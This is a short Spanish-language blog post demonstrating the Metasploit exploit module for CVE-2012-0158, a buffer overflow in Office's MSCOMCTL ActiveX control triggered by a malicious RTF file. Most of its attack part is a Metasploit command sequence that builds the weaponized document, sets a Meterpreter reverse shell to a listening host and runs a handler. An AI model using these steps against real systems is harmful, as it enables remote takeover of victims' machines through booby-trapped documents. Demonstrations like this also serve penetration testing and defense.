Metasploit demo: BOF MSCOMCTL ActiveX (CVE-2012-0158)

Recientemente Juan Vazquez y sinn3r han publicado el módulo en Metasploit para la vulnerabilidad CVE-2012-0158 descubierta este mismo mes durante una campaña de spam con asunto "Tibetan Input Method for Apple iOS 4.2" (imagen de la derecha).

Se trata de un desbordamiento de buffer en MSCOMCTL.OCX y utiliza un RTF malicioso para embeber un control MSComctlLib.ListViewCtrl.2 especialmente modificado. Es válido para Office 2007 y 2010 y en el caso de este último realiza un bypass de DEP/ASL mediante la cadena Ikazuchi ROP propuesta por Abyssec.

Para ejecutar correctamente el exploit primero debemos abrir el Office y luego el fichero malicioso (Abrir -> Fichero).


Referencias:



Comandos:

use exploit/windows/fileformat/ms12_027_mscomctl_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.21.47
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.21.47
exploit -j

getuid
sysinfo

Vídeo DEMO (Eric Romang):



0 comentarios :

Publicar un comentario en la entrada